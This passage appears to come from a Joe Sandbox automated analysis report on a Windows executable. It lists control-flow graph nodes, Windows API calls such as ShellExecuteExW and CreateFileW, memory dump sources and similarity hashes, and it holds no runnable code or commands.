1930->1937 1938 7ff741ec1b1b-7ff741ec1b2e GetProcAddress 1930->1938 1939 7ff741ec1a69-7ff741ec1a7c 1931->1939 1940 7ff741ec1a7e-7ff741ec1aa4 call 7ff741ec1868 RaiseException 1931->1940 1943 7ff741ec1ab4-7ff741ec1ab7 FreeLibrary 1932->1943 1944 7ff741ec1abd 1932->1944 1933->1920 1941 7ff741ec1bb0 call 7ff741ec1868 1934->1941 1942 7ff741ec1b95-7ff741ec1ba6 1934->1942 1937->1938 1945 7ff741ec1af4-7ff741ec1aff 1937->1945 1938->1929 1948 7ff741ec1b30-7ff741ec1b43 GetLastError 1938->1948 1939->1932 1939->1940 1940->1919 1951 7ff741ec1bb5 1941->1951 1942->1941 1943->1944 1944->1922 1945->1938 1949 7ff741ec1b01-7ff741ec1b08 1945->1949 1953 7ff741ec1b45-7ff741ec1b58 1948->1953 1954 7ff741ec1b5a-7ff741ec1b81 call 7ff741ec1868 RaiseException call 7ff741ec1558 1948->1954 1949->1938 1955 7ff741ec1b0a-7ff741ec1b0f 1949->1955 1951->1919 1953->1929 1953->1954 1954->1929 1955->1938 1957 7ff741ec1b11-7ff741ec1b19 1955->1957 1957->1929 1957->1938
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
      • String ID: H
      • API String ID: 3432403771-2852464175
      • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
      • Instruction ID: f53c78b31e8505598dd75311bd9f851f380e2062a94d14cf855d9d9fc975b367
      • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
      • Instruction Fuzzy Hash: FC915E3AA09B22C6EB42FF65D8406ACB3B1BB08B95B884435DE1D17754EFB9E445C720

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 1987 7ff741ebf4e0-7ff741ebf523 1988 7ff741ebf894-7ff741ebf8b9 call 7ff741e91fa0 call 7ff741ec2320 1987->1988 1989 7ff741ebf529-7ff741ebf565 call 7ff741ec3cf0 1987->1989 1995 7ff741ebf56a-7ff741ebf571 1989->1995 1996 7ff741ebf567 1989->1996 1998 7ff741ebf582-7ff741ebf586 1995->1998 1999 7ff741ebf573-7ff741ebf577 1995->1999 1996->1995 2000 7ff741ebf588 1998->2000 2001 7ff741ebf58b-7ff741ebf596 1998->2001 2002 7ff741ebf579 1999->2002 2003 7ff741ebf57c-7ff741ebf580 1999->2003 2000->2001 2004 7ff741ebf628 2001->2004 2005 7ff741ebf59c 2001->2005 2002->2003 2003->2001 2007 7ff741ebf62c-7ff741ebf62f 2004->2007 2006 7ff741ebf5a2-7ff741ebf5a9 2005->2006 2008 7ff741ebf5ae-7ff741ebf5b3 2006->2008 2009 7ff741ebf5ab 2006->2009 2010 7ff741ebf631-7ff741ebf635 2007->2010 2011 7ff741ebf637-7ff741ebf63a 2007->2011 2012 7ff741ebf5e5-7ff741ebf5f0 2008->2012 2013 7ff741ebf5b5 2008->2013 2009->2008 2010->2011 2014 7ff741ebf660-7ff741ebf673 call 7ff741ea63ac 2010->2014 2011->2014 2015 7ff741ebf63c-7ff741ebf643 2011->2015 2016 7ff741ebf5f2 2012->2016 2017 7ff741ebf5f5-7ff741ebf5fa 2012->2017 2018 7ff741ebf5ca-7ff741ebf5d0 2013->2018 2026 7ff741ebf675-7ff741ebf693 call 7ff741eb13c4 2014->2026 2027 7ff741ebf698-7ff741ebf6ed call 7ff741ec797c call 7ff741e9129c call 7ff741ea32a8 call 7ff741e91fa0 2014->2027 2015->2014 2019 7ff741ebf645-7ff741ebf65c 2015->2019 2016->2017 2022 7ff741ebf600-7ff741ebf607 2017->2022 2023 7ff741ebf8ba-7ff741ebf8c1 2017->2023 2024 7ff741ebf5d2 2018->2024 2025 7ff741ebf5b7-7ff741ebf5be 2018->2025 2019->2014 2028 7ff741ebf609 2022->2028 2029 7ff741ebf60c-7ff741ebf612 2022->2029 2032 7ff741ebf8c6-7ff741ebf8cb 2023->2032 2033 7ff741ebf8c3 2023->2033 2024->2012 2030 7ff741ebf5c0 2025->2030 2031 7ff741ebf5c3-7ff741ebf5c8 2025->2031 2026->2027 2054 7ff741ebf742-7ff741ebf74f ShellExecuteExW 2027->2054 2055 7ff741ebf6ef-7ff741ebf73d call 7ff741ec797c call 7ff741e9129c call 7ff741ea5b60 call 7ff741e91fa0 2027->2055 2028->2029 2029->2023 2036 7ff741ebf618-7ff741ebf622 2029->2036 2030->2031 2031->2018 2037 7ff741ebf5d4-7ff741ebf5db 2031->2037 2038 7ff741ebf8de-7ff741ebf8e6 2032->2038 2039 7ff741ebf8cd-7ff741ebf8d4 2032->2039 2033->2032 2036->2004 2036->2006 2046 7ff741ebf5e0 2037->2046 2047 7ff741ebf5dd 2037->2047 2043 7ff741ebf8e8 2038->2043 2044 7ff741ebf8eb-7ff741ebf8f6 2038->2044 2040 7ff741ebf8d6 2039->2040 2041 7ff741ebf8d9 2039->2041 2040->2041 2041->2038 2043->2044 2044->2007 2046->2012 2047->2046 2056 7ff741ebf846-7ff741ebf84e 2054->2056 2057 7ff741ebf755-7ff741ebf75f 2054->2057 2055->2054 2059 7ff741ebf882-7ff741ebf88f 2056->2059 2060 7ff741ebf850-7ff741ebf866 2056->2060 2061 7ff741ebf761-7ff741ebf764 2057->2061 2062 7ff741ebf76f-7ff741ebf772 2057->2062 2059->1988 2065 7ff741ebf868-7ff741ebf87b 2060->2065 2066 7ff741ebf87d call 7ff741ec220c 2060->2066 2061->2062 2067 7ff741ebf766-7ff741ebf76d 2061->2067 2068 7ff741ebf774-7ff741ebf77f call 7ff741efe188 2062->2068 2069 7ff741ebf78e-7ff741ebf7ad call 7ff741efe1b8 call 7ff741ebfe24 2062->2069 2065->2066 2072 7ff741ebf8fb-7ff741ebf903 call 7ff741ec7904 2065->2072 2066->2059 2067->2062 2074 7ff741ebf7e3-7ff741ebf7f0 CloseHandle 2067->2074 2068->2069 2088 7ff741ebf781-7ff741ebf78c ShowWindow 2068->2088 2069->2074 2095 7ff741ebf7af-7ff741ebf7b2 2069->2095 2079 7ff741ebf7f2-7ff741ebf803 call 7ff741eb13c4 2074->2079 2080 7ff741ebf805-7ff741ebf80c 2074->2080 2079->2080 2086 7ff741ebf82e-7ff741ebf830 2079->2086 2080->2086 2087 7ff741ebf80e-7ff741ebf811 2080->2087 2086->2056 2093 7ff741ebf832-7ff741ebf835 2086->2093 2087->2086 2092 7ff741ebf813-7ff741ebf828 2087->2092 2088->2069 2092->2086 2093->2056 2094 7ff741ebf837-7ff741ebf845 ShowWindow 2093->2094 2094->2056 2095->2074 2097 7ff741ebf7b4-7ff741ebf7c5 GetExitCodeProcess 2095->2097 2097->2074 2098 7ff741ebf7c7-7ff741ebf7dc 2097->2098 2098->2074
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
      • String ID: .exe$.inf$Install$p
      • API String ID: 1054546013-3607691742
      • Opcode ID: 40f5f92258db821d5e8367eba2153224afcb316e6e5fa6c437148e7c2f9bac4c
      • Instruction ID: 520dc9fd96b3e7fb94b5ba4ff13d6a31bece0ba8049929f072261a2df1fa83db
      • Opcode Fuzzy Hash: 40f5f92258db821d5e8367eba2153224afcb316e6e5fa6c437148e7c2f9bac4c
      • Instruction Fuzzy Hash: 6DC18D2AF1D622D5FB02FB25D940279A3B1BF85B82F844131DE4D476A5EFBDE8518320

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
      • String ID:
      • API String ID: 3569833718-0
      • Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
      • Instruction ID: 36a34e7af9bf7ca724ec00ac13fd26648a75f015b31ed43e97e03f63b74c21a4
      • Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
      • Instruction Fuzzy Hash: A241DF39F18662C6F701FF61E814BAA6360FB89B89FC40135DD0A07B95CEBDE4458764

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 2674 7ff741eb87d8-7ff741eb880e 2675 7ff741eb8810 2674->2675 2676 7ff741eb8813-7ff741eb8817 2674->2676 2675->2676 2677 7ff741eb8a2f call 7ff741ea32a8 2676->2677 2678 7ff741eb881d-7ff741eb8822 2676->2678 2682 7ff741eb8a34-7ff741eb8a36 2677->2682 2679 7ff741eb8824 2678->2679 2680 7ff741eb8827-7ff741eb882f 2678->2680 2679->2680 2683 7ff741eb8d92-7ff741eb8db5 call 7ff741ec2320 2680->2683 2684 7ff741eb8835-7ff741eb8840 2680->2684 2682->2683 2685 7ff741eb8a3c-7ff741eb8a49 2682->2685 2684->2683 2686 7ff741eb8846-7ff741eb884a 2684->2686 2685->2683 2688 7ff741eb8a4f-7ff741eb8a55 2685->2688 2689 7ff741eb884c-7ff741eb8854 2686->2689 2690 7ff741eb885b-7ff741eb885e 2686->2690 2692 7ff741eb8a5b-7ff741eb8a63 2688->2692 2689->2686 2693 7ff741eb8856 2689->2693 2690->2683 2694 7ff741eb8864-7ff741eb8871 2690->2694 2695 7ff741eb8a65 2692->2695 2696 7ff741eb8a68-7ff741eb8a6d 2692->2696 2693->2683 2694->2683 2697 7ff741eb8877-7ff741eb888a 2694->2697 2695->2696 2698 7ff741eb8a6f-7ff741eb8a77 2696->2698 2699 7ff741eb8a87-7ff741eb8aa5 2696->2699 2700 7ff741eb8890-7ff741eb88a2 2697->2700 2701 7ff741eb8dbc-7ff741eb8dc1 call 7ff741e9704c 2697->2701 2703 7ff741eb8a79 2698->2703 2704 7ff741eb8a7c-7ff741eb8a81 2698->2704 2705 7ff741eb8aaa-7ff741eb8abf call 7ff741e9129c call 7ff741ea32a8 2699->2705 2706 7ff741eb8aa7 2699->2706 2707 7ff741eb88a4 2700->2707 2708 7ff741eb88a7-7ff741eb88c7 call 7ff741e9129c 2700->2708 2713 7ff741eb8dc2-7ff741eb8dc7 call 7ff741ec7904 2701->2713 2703->2704 2704->2699 2710 7ff741eb8b13-7ff741eb8b1d 2704->2710 2730 7ff741eb8ac1-7ff741eb8ad3 call 7ff741ea32bc call 7ff741ea33a0 2705->2730 2731 7ff741eb8ad7-7ff741eb8adf 2705->2731 2706->2705 2707->2708 2720 7ff741eb8935-7ff741eb893d 2708->2720 2721 7ff741eb88c9-7ff741eb88d1 2708->2721 2710->2692 2714 7ff741eb8b23-7ff741eb8b26 2710->2714 2735 7ff741eb8dc8-7ff741eb8dcd call 7ff741e9704c 2713->2735 2714->2683 2718 7ff741eb8b2c-7ff741eb8b37 2714->2718 2727 7ff741eb8b39 2718->2727 2728 7ff741eb8b3c-7ff741eb8b42 2718->2728 2725 7ff741eb8971-7ff741eb8985 2720->2725 2726 7ff741eb893f-7ff741eb8951 2720->2726 2722 7ff741eb8904-7ff741eb8930 call 7ff741ec3640 2721->2722 2723 7ff741eb88d3-7ff741eb88e1 2721->2723 2722->2720 2732 7ff741eb88ff call 7ff741ec220c 2723->2732 2733 7ff741eb88e3-7ff741eb88f6 2723->2733 2725->2735 2738 7ff741eb898b-7ff741eb89a2 2725->2738 2736 7ff741eb8953-7ff741eb8966 2726->2736 2737 7ff741eb896c call 7ff741ec220c 2726->2737 2727->2728 2739 7ff741eb8b48-7ff741eb8b57 2728->2739 2740 7ff741eb8bf7-7ff741eb8bfe 2728->2740 2730->2731 2731->2710 2748 7ff741eb8ae1-7ff741eb8af3 2731->2748 2732->2722 2733->2713 2746 7ff741eb88fc 2733->2746 2772 7ff741eb8dce-7ff741eb8dd3 call 7ff741ec7904 2735->2772 2736->2713 2736->2737 2737->2725 2752 7ff741eb89a4 2738->2752 2753 7ff741eb89a7-7ff741eb89bf call 7ff741e9129c 2738->2753 2741 7ff741eb8dd4-7ff741eb8dd9 call 7ff741e9704c 2739->2741 2742 7ff741eb8b5d-7ff741eb8b72 2739->2742 2744 7ff741eb8c00 2740->2744 2745 7ff741eb8c03-7ff741eb8c09 2740->2745 2770 7ff741eb8dda-7ff741eb8ddf call 7ff741ec7904 2741->2770 2760 7ff741eb8b74 2742->2760 2761 7ff741eb8b77-7ff741eb8b8b call 7ff741e9129c 2742->2761 2744->2745 2756 7ff741eb8c24-7ff741eb8c2d 2745->2756 2757 7ff741eb8c0b-7ff741eb8c13 2745->2757 2746->2732 2758 7ff741eb8af5-7ff741eb8b08 2748->2758 2759 7ff741eb8b0e call 7ff741ec220c 2748->2759 2752->2753 2775 7ff741eb89c1-7ff741eb89e5 call 7ff741e91fa0 call 7ff741ec3640 2753->2775 2776 7ff741eb89ea-7ff741eb89f2 2753->2776 2768 7ff741eb8c32 2756->2768 2769 7ff741eb8c2f 2756->2769 2767 7ff741eb8c1f-7ff741eb8c22 2757->2767 2758->2759 2758->2770 2759->2710 2760->2761 2786 7ff741eb8bb6-7ff741eb8bbe 2761->2786 2787 7ff741eb8b8d-7ff741eb8bb1 call 7ff741e91fa0 call 7ff741ec3640 2761->2787 2767->2756 2778 7ff741eb8c15-7ff741eb8c19 2767->2778 2779 7ff741eb8c36-7ff741eb8c3a 2768->2779 2769->2768 2792 7ff741eb8de0-7ff741eb8de5 call 7ff741ec7904 2770->2792 2772->2741 2775->2776 2776->2683 2788 7ff741eb89f8-7ff741eb8a0a 2776->2788 2784 7ff741eb8c5b-7ff741eb8c68 2778->2784 2785 7ff741eb8c1b 2778->2785 2789 7ff741eb8c40-7ff741eb8c4c 2779->2789 2790 7ff741eb8de6-7ff741eb8deb call 7ff741e9704c 2779->2790 2784->2756 2799 7ff741eb8c6a-7ff741eb8c79 2784->2799 2785->2767 2801 7ff741eb8bf2-7ff741eb8bf5 2786->2801 2802 7ff741eb8bc0-7ff741eb8bd2 2786->2802 2787->2786 2795 7ff741eb8a25-7ff741eb8a2a call 7ff741ec220c 2788->2795 2796 7ff741eb8a0c-7ff741eb8a1f 2788->2796 2797 7ff741eb8c51-7ff741eb8c56 2789->2797 2798 7ff741eb8c4e 2789->2798 2804 7ff741eb8dec-7ff741eb8df3 call 7ff741e9704c 2790->2804 2792->2790 2795->2683 2796->2772 2796->2795 2812 7ff741eb8d89-7ff741eb8d90 2797->2812 2798->2797 2803 7ff741eb8c7f-7ff741eb8c90 2799->2803 2799->2804 2801->2779 2810 7ff741eb8bd4-7ff741eb8be7 2802->2810 2811 7ff741eb8bed call 7ff741ec220c 2802->2811 2818 7ff741eb8c92 2803->2818 2819 7ff741eb8c95-7ff741eb8ca9 call 7ff741e9129c 2803->2819 2810->2792 2810->2811 2811->2801 2812->2683 2816 7ff741eb8d58-7ff741eb8d63 2812->2816 2823 7ff741eb8d65 2816->2823 2824 7ff741eb8d68-7ff741eb8d6e 2816->2824 2818->2819 2829 7ff741eb8d17-7ff741eb8d1f 2819->2829 2830 7ff741eb8cab-7ff741eb8cb3 2819->2830 2823->2824 2824->2683 2827 7ff741eb8d70-7ff741eb8d7f 2824->2827 2831 7ff741eb8d81 2827->2831 2832 7ff741eb8d84 2827->2832 2829->2779 2835 7ff741eb8d25-7ff741eb8d37 2829->2835 2833 7ff741eb8ce6-7ff741eb8d12 call 7ff741ec3640 2830->2833 2834 7ff741eb8cb5-7ff741eb8cc3 2830->2834 2831->2832 2832->2812 2833->2829 2838 7ff741eb8ce1 call 7ff741ec220c 2834->2838 2839 7ff741eb8cc5-7ff741eb8cd8 2834->2839 2836 7ff741eb8d39-7ff741eb8d4c 2835->2836 2837 7ff741eb8d4e-7ff741eb8d53 call 7ff741ec220c 2835->2837 2836->2837 2841 7ff741eb8db6-7ff741eb8dbb call 7ff741ec7904 2836->2841 2837->2779 2838->2833 2839->2841 2843 7ff741eb8cde 2839->2843 2841->2701 2843->2838
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: $
      • API String ID: 3668304517-227171996
      • Opcode ID: 13ce0140fcad086c7967ae2b9afad083efca3074a1889f830416c9c45801d476
      • Instruction ID: 65859f62133deea81a28baac0e16a7417e701a2c2c9a51b088c361332ac8d20f
      • Opcode Fuzzy Hash: 13ce0140fcad086c7967ae2b9afad083efca3074a1889f830416c9c45801d476
      • Instruction Fuzzy Hash: EDF1DD6AF18666C0EF05FB64D4445BCA362BB44BA9F805231CA6D177D5EFBCE082C360
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3668304517-0
      • Opcode ID: e994a9db728abc9e3b7c2f1aeddd0c1bbb8b4fdc17eb45be45aeabee48c93372
      • Instruction ID: df997bf58cece361c7805e341570a71e68694a155ee25f36be72c8de5f70ab3f
      • Opcode Fuzzy Hash: e994a9db728abc9e3b7c2f1aeddd0c1bbb8b4fdc17eb45be45aeabee48c93372
      • Instruction Fuzzy Hash: 2512E266F2C752C4EB11FB64D4402ADA772BB467A9F800232DA6C17ADADFBCD485C350

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 3701 7ff741ea24c0-7ff741ea24fb 3702 7ff741ea2506 3701->3702 3703 7ff741ea24fd-7ff741ea2504 3701->3703 3704 7ff741ea2509-7ff741ea2578 3702->3704 3703->3702 3703->3704 3705 7ff741ea257a 3704->3705 3706 7ff741ea257d-7ff741ea25a8 CreateFileW 3704->3706 3705->3706 3707 7ff741ea2688-7ff741ea268d 3706->3707 3708 7ff741ea25ae-7ff741ea25de GetLastError call 7ff741ea6a0c 3706->3708 3709 7ff741ea2693-7ff741ea2697 3707->3709 3717 7ff741ea25e0-7ff741ea262a CreateFileW GetLastError 3708->3717 3718 7ff741ea262c 3708->3718 3711 7ff741ea26a5-7ff741ea26a9 3709->3711 3712 7ff741ea2699-7ff741ea269c 3709->3712 3715 7ff741ea26cf-7ff741ea26e3 3711->3715 3716 7ff741ea26ab-7ff741ea26af 3711->3716 3712->3711 3714 7ff741ea269e 3712->3714 3714->3711 3720 7ff741ea26e5-7ff741ea26f0 3715->3720 3721 7ff741ea270c-7ff741ea2735 call 7ff741ec2320 3715->3721 3716->3715 3719 7ff741ea26b1-7ff741ea26c9 SetFileTime 3716->3719 3722 7ff741ea2632-7ff741ea263a 3717->3722 3718->3722 3719->3715 3723 7ff741ea26f2-7ff741ea26fa 3720->3723 3724 7ff741ea2708 3720->3724 3725 7ff741ea2673-7ff741ea2686 3722->3725 3726 7ff741ea263c-7ff741ea2653 3722->3726 3729 7ff741ea26ff-7ff741ea2703 call 7ff741e920b0 3723->3729 3730 7ff741ea26fc 3723->3730 3724->3721 3725->3709 3731 7ff741ea2655-7ff741ea2668 3726->3731 3732 7ff741ea266e call 7ff741ec220c 3726->3732 3729->3724 3730->3729 3731->3732 3734 7ff741ea2736-7ff741ea273b call 7ff741ec7904 3731->3734 3732->3725
      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3536497005-0
      • Opcode ID: 7e74b88d639c8d570aa5cbccebcd9353285634c108726f52f9c563d03d833b9c
      • Instruction ID: 66670761b05a3ff096d156d8d24ddb09d21d8ca3d63cc42bd80284d1864fb9f8
      • Opcode Fuzzy Hash: 7e74b88d639c8d570aa5cbccebcd9353285634c108726f52f9c563d03d833b9c
      • Instruction Fuzzy Hash: 7B61026AB1C652C5EB21BB29E40036EA7B1BB847A8F501334DEAD13AD9DF7DC055C710

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
      • String ID: ]
      • API String ID: 3561356813-3352871620
      • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
      • Instruction ID: 61c3fdbea1c43e7c8bd5d7d28ed5767f28d7676605cde01b65aa7666091576b3
      • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
      • Instruction Fuzzy Hash: 00119328B0D252C1FB26FB21A644679D292BF88BC2F880134DD5D07B99DEACE9058624

      Control-flow Graph

      APIs
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Message$DialogDispatchPeekTranslate
      • String ID:
      • API String ID: 1266772231-0
      • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
      • Instruction ID: 674d6299a4ccb5e49e6784c32065778231c432ecf63c857f21cdabfa189650d4
      • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
      • Instruction Fuzzy Hash: 03F0EC2AB3C562E2FB61FB25E895A76A3A1BFD0706FC15431E94E42854DF6CE508CB10

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: AutoClassCompareCompleteFindNameStringWindow
      • String ID: EDIT
      • API String ID: 4243998846-3080729518
      • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
      • Instruction ID: 1ed1dbac67dbb5eff74ba8d24eaa71349ead954d4cdf7a16bc0a8df6bfec8421
      • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
      • Instruction Fuzzy Hash: 78016769B1C763C1FB22F721B8103F5A390BF98742FC40131CD4D46655EFACE1498660

      Control-flow Graph

      • Executed
      • Not Executed
